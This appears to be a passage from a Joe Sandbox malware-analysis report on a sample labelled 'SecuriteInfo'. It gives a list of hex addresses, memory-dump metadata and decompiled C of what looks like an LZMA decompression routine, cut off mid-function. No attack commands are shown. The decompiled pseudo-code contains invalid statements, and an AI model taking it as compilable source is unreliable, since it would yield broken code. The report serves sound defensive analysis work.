                                                                                                                          0x00000000
                                                                                                                          0x0040717d
                                                                                                                          0x0040717d
                                                                                                                          0x0040717f
                                                                                                                          0x00407186
                                                                                                                          0x00407187
                                                                                                                          0x00407189
                                                                                                                          0x0040718c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407490
                                                                                                                          0x00407490
                                                                                                                          0x00407493
                                                                                                                          0x0040749a
                                                                                                                          0x00000000
                                                                                                                          0x0040749d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004071c2
                                                                                                                          0x004071c2
                                                                                                                          0x004071c5
                                                                                                                          0x004071fb
                                                                                                                          0x004071fb
                                                                                                                          0x0040732b
                                                                                                                          0x0040732b
                                                                                                                          0x0040732b
                                                                                                                          0x0040732b
                                                                                                                          0x0040732e
                                                                                                                          0x0040732e
                                                                                                                          0x00407331
                                                                                                                          0x00407333
                                                                                                                          0x004075bd
                                                                                                                          0x004075bd
                                                                                                                          0x00000000
                                                                                                                          0x004075bd
                                                                                                                          0x00407339
                                                                                                                          0x00407339
                                                                                                                          0x0040733c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407342
                                                                                                                          0x00407342
                                                                                                                          0x00407346
                                                                                                                          0x00407349
                                                                                                                          0x00407349
                                                                                                                          0x00407349
                                                                                                                          0x00000000
                                                                                                                          0x00407349
                                                                                                                          0x004071c7
                                                                                                                          0x004071c7
                                                                                                                          0x004071c9
                                                                                                                          0x004071cb
                                                                                                                          0x004071cd
                                                                                                                          0x004071d0
                                                                                                                          0x004071d1
                                                                                                                          0x004071d3
                                                                                                                          0x004071d5
                                                                                                                          0x004071d8
                                                                                                                          0x004071db
                                                                                                                          0x004071f1
                                                                                                                          0x004071f1
                                                                                                                          0x004071f6
                                                                                                                          0x0040722e
                                                                                                                          0x0040722e
                                                                                                                          0x00407232
                                                                                                                          0x0040725b
                                                                                                                          0x0040725e
                                                                                                                          0x00407260
                                                                                                                          0x00407267
                                                                                                                          0x0040726a
                                                                                                                          0x0040726d
                                                                                                                          0x0040726d
                                                                                                                          0x00407272
                                                                                                                          0x00407272
                                                                                                                          0x00407274
                                                                                                                          0x00407277
                                                                                                                          0x0040727e
                                                                                                                          0x00407281
                                                                                                                          0x004072ae
                                                                                                                          0x004072ae
                                                                                                                          0x004072b1
                                                                                                                          0x004072b4
                                                                                                                          0x00407328
                                                                                                                          0x00407328
                                                                                                                          0x00407328
                                                                                                                          0x00407328
                                                                                                                          0x00000000
                                                                                                                          0x00407328
                                                                                                                          0x004072b6
                                                                                                                          0x004072b6
                                                                                                                          0x004072bc
                                                                                                                          0x004072bf
                                                                                                                          0x004072c2
                                                                                                                          0x004072c5
                                                                                                                          0x004072c8
                                                                                                                          0x004072cb
                                                                                                                          0x004072ce
                                                                                                                          0x004072d1
                                                                                                                          0x004072d4
                                                                                                                          0x004072d7
                                                                                                                          0x004072f0
                                                                                                                          0x004072f2
                                                                                                                          0x004072f5
                                                                                                                          0x004072f6
                                                                                                                          0x004072f9
                                                                                                                          0x004072fb
                                                                                                                          0x004072fe
                                                                                                                          0x00407300
                                                                                                                          0x00407302
                                                                                                                          0x00407305
                                                                                                                          0x00407307
                                                                                                                          0x0040730a
                                                                                                                          0x0040730e
                                                                                                                          0x00407310
                                                                                                                          0x00407310
                                                                                                                          0x00407311
                                                                                                                          0x00407314
                                                                                                                          0x00407317
                                                                                                                          0x004072d9
                                                                                                                          0x004072d9
                                                                                                                          0x004072e1
                                                                                                                          0x004072e6
                                                                                                                          0x004072e8
                                                                                                                          0x004072eb
                                                                                                                          0x004072eb
                                                                                                                          0x0040731a
                                                                                                                          0x00407321
                                                                                                                          0x004072ab
                                                                                                                          0x004072ab
                                                                                                                          0x004072ab
                                                                                                                          0x004072ab
                                                                                                                          0x00000000
                                                                                                                          0x00407323
                                                                                                                          0x00407323
                                                                                                                          0x00000000
                                                                                                                          0x00407323
                                                                                                                          0x00407321
                                                                                                                          0x00407234
                                                                                                                          0x00407234
                                                                                                                          0x00407237
                                                                                                                          0x00407239
                                                                                                                          0x0040723c
                                                                                                                          0x0040723f
                                                                                                                          0x00407242
                                                                                                                          0x00407244
                                                                                                                          0x00407247
                                                                                                                          0x0040724a
                                                                                                                          0x0040724a
                                                                                                                          0x0040724d
                                                                                                                          0x0040724d
                                                                                                                          0x00407250
                                                                                                                          0x00407257
                                                                                                                          0x0040722b
                                                                                                                          0x0040722b
                                                                                                                          0x0040722b
                                                                                                                          0x0040722b
                                                                                                                          0x00000000
                                                                                                                          0x00407259
                                                                                                                          0x00407259
                                                                                                                          0x00000000
                                                                                                                          0x00407259
                                                                                                                          0x00407257
                                                                                                                          0x004071dd
                                                                                                                          0x004071dd
                                                                                                                          0x004071e0
                                                                                                                          0x004071e2
                                                                                                                          0x004071e5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406f44
                                                                                                                          0x00406f44
                                                                                                                          0x00406f48
                                                                                                                          0x0040758d
                                                                                                                          0x0040758d
                                                                                                                          0x00000000
                                                                                                                          0x0040758d
                                                                                                                          0x00406f4e
                                                                                                                          0x00406f4e
                                                                                                                          0x00406f51
                                                                                                                          0x00406f54
                                                                                                                          0x00406f57
                                                                                                                          0x00406f5a
                                                                                                                          0x00406f5d
                                                                                                                          0x00406f60
                                                                                                                          0x00406f62
                                                                                                                          0x00406f65
                                                                                                                          0x00406f68
                                                                                                                          0x00406f6b
                                                                                                                          0x00406f6d
                                                                                                                          0x00406f6d
                                                                                                                          0x00406f6d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004070cf
                                                                                                                          0x004070cf
                                                                                                                          0x004070d3
                                                                                                                          0x00407599
                                                                                                                          0x00407599
                                                                                                                          0x00000000
                                                                                                                          0x00407599
                                                                                                                          0x004070d9
                                                                                                                          0x004070d9
                                                                                                                          0x004070dc
                                                                                                                          0x004070df
                                                                                                                          0x004070e2
                                                                                                                          0x004070e4
                                                                                                                          0x004070e4
                                                                                                                          0x004070e4
                                                                                                                          0x004070e7
                                                                                                                          0x004070ea
                                                                                                                          0x004070ed
                                                                                                                          0x004070f0
                                                                                                                          0x004070f3
                                                                                                                          0x004070f6
                                                                                                                          0x004070f7
                                                                                                                          0x004070f9
                                                                                                                          0x004070f9
                                                                                                                          0x004070f9
                                                                                                                          0x004070fc
                                                                                                                          0x004070ff
                                                                                                                          0x00407102
                                                                                                                          0x00407105
                                                                                                                          0x00407105
                                                                                                                          0x00407105
                                                                                                                          0x00407108
                                                                                                                          0x0040710a
                                                                                                                          0x0040710a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040734c
                                                                                                                          0x0040734c
                                                                                                                          0x0040734c
                                                                                                                          0x00407350
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407356
                                                                                                                          0x00407356
                                                                                                                          0x00407359
                                                                                                                          0x0040735c
                                                                                                                          0x0040735f
                                                                                                                          0x00407361
                                                                                                                          0x00407361
                                                                                                                          0x00407361
                                                                                                                          0x00407364
                                                                                                                          0x00407367
                                                                                                                          0x0040736a
                                                                                                                          0x0040736d
                                                                                                                          0x00407370
                                                                                                                          0x00407373
                                                                                                                          0x00407374
                                                                                                                          0x00407376
                                                                                                                          0x00407376
                                                                                                                          0x00407376
                                                                                                                          0x00407379
                                                                                                                          0x0040737c
                                                                                                                          0x0040737f
                                                                                                                          0x00407382
                                                                                                                          0x00407385
                                                                                                                          0x00407389
                                                                                                                          0x0040738b
                                                                                                                          0x0040738e
                                                                                                                          0x00000000
                                                                                                                          0x00407390
                                                                                                                          0x00407390
                                                                                                                          0x0040710d
                                                                                                                          0x0040710d
                                                                                                                          0x00000000
                                                                                                                          0x0040710d
                                                                                                                          0x0040738e
                                                                                                                          0x004075c3
                                                                                                                          0x004075c3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406bf2
                                                                                                                          0x004075fa
                                                                                                                          0x004075fa
                                                                                                                          0x00000000
                                                                                                                          0x004075fa
                                                                                                                          0x00407447
                                                                                                                          0x004074c7
                                                                                                                          0x00407490

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                                                          • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                                                                                          • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                                                          • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E00407395() {
                                                                                                                          				void _t533;
                                                                                                                          				signed int _t534;
                                                                                                                          				signed int _t535;
                                                                                                                          				signed int* _t605;
                                                                                                                          				void* _t612;
                                                                                                                          
                                                                                                                          				L0:
                                                                                                                          				while(1) {
                                                                                                                          					L0:
                                                                                                                          					if( *(_t612 - 0x40) != 0) {
                                                                                                                          						 *(_t612 - 0x84) = 0x13;
                                                                                                                          						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                                                                                          						goto L132;
                                                                                                                          					} else {
                                                                                                                          						__eax =  *(__ebp - 0x4c);
                                                                                                                          						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                          						__ecx =  *(__ebp - 0x58);
                                                                                                                          						__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                          						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                          						L130:
                                                                                                                          						 *(__ebp - 0x58) = __eax;
                                                                                                                          						 *(__ebp - 0x40) = 3;
                                                                                                                          						L144:
                                                                                                                          						 *(__ebp - 0x7c) = 0x14;
                                                                                                                          						L145:
                                                                                                                          						__eax =  *(__ebp - 0x40);
                                                                                                                          						 *(__ebp - 0x50) = 1;
                                                                                                                          						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                          						L149:
                                                                                                                          						if( *(__ebp - 0x48) <= 0) {
                                                                                                                          							__ecx =  *(__ebp - 0x40);
                                                                                                                          							__ebx =  *(__ebp - 0x50);
                                                                                                                          							0 = 1;
                                                                                                                          							__eax = 1 << __cl;
                                                                                                                          							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                          							__eax =  *(__ebp - 0x7c);
                                                                                                                          							 *(__ebp - 0x44) = __ebx;
                                                                                                                          							while(1) {
                                                                                                                          								L140:
                                                                                                                          								 *(_t612 - 0x88) = _t533;
                                                                                                                          								while(1) {
                                                                                                                          									L1:
                                                                                                                          									_t534 =  *(_t612 - 0x88);
                                                                                                                          									if(_t534 > 0x1c) {
                                                                                                                          										break;
                                                                                                                          									}
                                                                                                                          									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                                                                          										case 0:
                                                                                                                          											if( *(_t612 - 0x6c) == 0) {
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                          											_t534 =  *( *(_t612 - 0x70));
                                                                                                                          											if(_t534 > 0xe1) {
                                                                                                                          												goto L171;
                                                                                                                          											}
                                                                                                                          											_t538 = _t534 & 0x000000ff;
                                                                                                                          											_push(0x2d);
                                                                                                                          											asm("cdq");
                                                                                                                          											_pop(_t569);
                                                                                                                          											_push(9);
                                                                                                                          											_pop(_t570);
                                                                                                                          											_t608 = _t538 / _t569;
                                                                                                                          											_t540 = _t538 % _t569 & 0x000000ff;
                                                                                                                          											asm("cdq");
                                                                                                                          											_t603 = _t540 % _t570 & 0x000000ff;
                                                                                                                          											 *(_t612 - 0x3c) = _t603;
                                                                                                                          											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                                                                                          											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                                                                                          											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                                                                                          											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                                                                                          												L10:
                                                                                                                          												if(_t611 == 0) {
                                                                                                                          													L12:
                                                                                                                          													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                                                                                          													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                                                          													goto L15;
                                                                                                                          												} else {
                                                                                                                          													goto L11;
                                                                                                                          												}
                                                                                                                          												do {
                                                                                                                          													L11:
                                                                                                                          													_t611 = _t611 - 1;
                                                                                                                          													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                                                                                          												} while (_t611 != 0);
                                                                                                                          												goto L12;
                                                                                                                          											}
                                                                                                                          											if( *(_t612 - 4) != 0) {
                                                                                                                          												GlobalFree( *(_t612 - 4));
                                                                                                                          											}
                                                                                                                          											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                          											 *(_t612 - 4) = _t534;
                                                                                                                          											if(_t534 == 0) {
                                                                                                                          												goto L171;
                                                                                                                          											} else {
                                                                                                                          												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                                                                                          												goto L10;
                                                                                                                          											}
                                                                                                                          										case 1:
                                                                                                                          											L13:
                                                                                                                          											__eflags =  *(_t612 - 0x6c);
                                                                                                                          											if( *(_t612 - 0x6c) == 0) {
                                                                                                                          												 *(_t612 - 0x88) = 1;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                          											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                                                                                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                          											_t45 = _t612 - 0x48;
                                                                                                                          											 *_t45 =  *(_t612 - 0x48) + 1;
                                                                                                                          											__eflags =  *_t45;
                                                                                                                          											L15:
                                                                                                                          											if( *(_t612 - 0x48) < 4) {
                                                                                                                          												goto L13;
                                                                                                                          											}
                                                                                                                          											_t546 =  *(_t612 - 0x40);
                                                                                                                          											if(_t546 ==  *(_t612 - 0x74)) {
                                                                                                                          												L20:
                                                                                                                          												 *(_t612 - 0x48) = 5;
                                                                                                                          												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                                                                                          												goto L23;
                                                                                                                          											}
                                                                                                                          											 *(_t612 - 0x74) = _t546;
                                                                                                                          											if( *(_t612 - 8) != 0) {
                                                                                                                          												GlobalFree( *(_t612 - 8));
                                                                                                                          											}
                                                                                                                          											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                                                                                          											 *(_t612 - 8) = _t534;
                                                                                                                          											if(_t534 == 0) {
                                                                                                                          												goto L171;
                                                                                                                          											} else {
                                                                                                                          												goto L20;
                                                                                                                          											}
                                                                                                                          										case 2:
                                                                                                                          											L24:
                                                                                                                          											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                                                                                          											 *(_t612 - 0x84) = 6;
                                                                                                                          											 *(_t612 - 0x4c) = _t553;
                                                                                                                          											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                                                                                          											goto L132;
                                                                                                                          										case 3:
                                                                                                                          											L21:
                                                                                                                          											__eflags =  *(_t612 - 0x6c);
                                                                                                                          											if( *(_t612 - 0x6c) == 0) {
                                                                                                                          												 *(_t612 - 0x88) = 3;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                          											_t67 = _t612 - 0x70;
                                                                                                                          											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                                                                                          											__eflags =  *_t67;
                                                                                                                          											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                                                          											L23:
                                                                                                                          											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                                                                                          											if( *(_t612 - 0x48) != 0) {
                                                                                                                          												goto L21;
                                                                                                                          											}
                                                                                                                          											goto L24;
                                                                                                                          										case 4:
                                                                                                                          											L133:
                                                                                                                          											_t531 =  *_t605;
                                                                                                                          											_t588 = _t531 & 0x0000ffff;
                                                                                                                          											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                                                                                          											if( *(_t612 - 0xc) >= _t564) {
                                                                                                                          												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                                                                                          												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                                                                                          												 *(_t612 - 0x40) = 1;
                                                                                                                          												_t532 = _t531 - (_t531 >> 5);
                                                                                                                          												__eflags = _t532;
                                                                                                                          												 *_t605 = _t532;
                                                                                                                          											} else {
                                                                                                                          												 *(_t612 - 0x10) = _t564;
                                                                                                                          												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                                                          												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                                                                                          											}
                                                                                                                          											if( *(_t612 - 0x10) >= 0x1000000) {
                                                                                                                          												goto L139;
                                                                                                                          											} else {
                                                                                                                          												goto L137;
                                                                                                                          											}
                                                                                                                          										case 5:
                                                                                                                          											L137:
                                                                                                                          											if( *(_t612 - 0x6c) == 0) {
                                                                                                                          												 *(_t612 - 0x88) = 5;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                                                                                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                          											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                                                          											L139:
                                                                                                                          											_t533 =  *(_t612 - 0x84);
                                                                                                                          											goto L140;
                                                                                                                          										case 6:
                                                                                                                          											__edx = 0;
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												__ecx =  *(__ebp - 0x38);
                                                                                                                          												 *(__ebp - 0x34) = 1;
                                                                                                                          												 *(__ebp - 0x84) = 7;
                                                                                                                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                          												goto L132;
                                                                                                                          											}
                                                                                                                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                          											__esi =  *(__ebp - 0x60);
                                                                                                                          											__cl = 8;
                                                                                                                          											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                          											__ecx =  *(__ebp - 0x3c);
                                                                                                                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                          											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          											if( *(__ebp - 0x38) >= 4) {
                                                                                                                          												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                          												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                          													_t98 = __ebp - 0x38;
                                                                                                                          													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                          													__eflags =  *_t98;
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                          												}
                                                                                                                          											} else {
                                                                                                                          												 *(__ebp - 0x38) = 0;
                                                                                                                          											}
                                                                                                                          											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                          											if( *(__ebp - 0x34) == __edx) {
                                                                                                                          												__ebx = 0;
                                                                                                                          												__ebx = 1;
                                                                                                                          												goto L61;
                                                                                                                          											} else {
                                                                                                                          												__eax =  *(__ebp - 0x14);
                                                                                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          													__eflags = __eax;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 8);
                                                                                                                          												__ebx = 0;
                                                                                                                          												__ebx = 1;
                                                                                                                          												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          												goto L41;
                                                                                                                          											}
                                                                                                                          										case 7:
                                                                                                                          											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                          											if( *(__ebp - 0x40) != 1) {
                                                                                                                          												__eax =  *(__ebp - 0x24);
                                                                                                                          												 *(__ebp - 0x80) = 0x16;
                                                                                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          												__eax =  *(__ebp - 0x28);
                                                                                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          												__eax =  *(__ebp - 0x2c);
                                                                                                                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          												__eax = 0;
                                                                                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          												__al = __al & 0x000000fd;
                                                                                                                          												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                          												__eflags = __eax;
                                                                                                                          												 *(__ebp - 0x58) = __eax;
                                                                                                                          												goto L69;
                                                                                                                          											}
                                                                                                                          											__eax =  *(__ebp - 4);
                                                                                                                          											__ecx =  *(__ebp - 0x38);
                                                                                                                          											 *(__ebp - 0x84) = 8;
                                                                                                                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                          											goto L132;
                                                                                                                          										case 8:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												__ecx =  *(__ebp - 0x38);
                                                                                                                          												 *(__ebp - 0x84) = 0xa;
                                                                                                                          												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                          											} else {
                                                                                                                          												__eax =  *(__ebp - 0x38);
                                                                                                                          												__ecx =  *(__ebp - 4);
                                                                                                                          												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                          												 *(__ebp - 0x84) = 9;
                                                                                                                          												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                          												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                          											}
                                                                                                                          											goto L132;
                                                                                                                          										case 9:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												goto L90;
                                                                                                                          											}
                                                                                                                          											__eflags =  *(__ebp - 0x60);
                                                                                                                          											if( *(__ebp - 0x60) == 0) {
                                                                                                                          												goto L171;
                                                                                                                          											}
                                                                                                                          											__eax = 0;
                                                                                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                          											__eflags = _t259;
                                                                                                                          											0 | _t259 = _t259 + _t259 + 9;
                                                                                                                          											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                          											goto L76;
                                                                                                                          										case 0xa:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												__ecx =  *(__ebp - 0x38);
                                                                                                                          												 *(__ebp - 0x84) = 0xb;
                                                                                                                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                          												goto L132;
                                                                                                                          											}
                                                                                                                          											__eax =  *(__ebp - 0x28);
                                                                                                                          											goto L89;
                                                                                                                          										case 0xb:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												__ecx =  *(__ebp - 0x24);
                                                                                                                          												__eax =  *(__ebp - 0x20);
                                                                                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          											} else {
                                                                                                                          												__eax =  *(__ebp - 0x24);
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x28);
                                                                                                                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          											L89:
                                                                                                                          											__ecx =  *(__ebp - 0x2c);
                                                                                                                          											 *(__ebp - 0x2c) = __eax;
                                                                                                                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          											L90:
                                                                                                                          											__eax =  *(__ebp - 4);
                                                                                                                          											 *(__ebp - 0x80) = 0x15;
                                                                                                                          											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                          											goto L69;
                                                                                                                          										case 0xc:
                                                                                                                          											L100:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0xc;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t335 = __ebp - 0x70;
                                                                                                                          											 *_t335 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t335;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
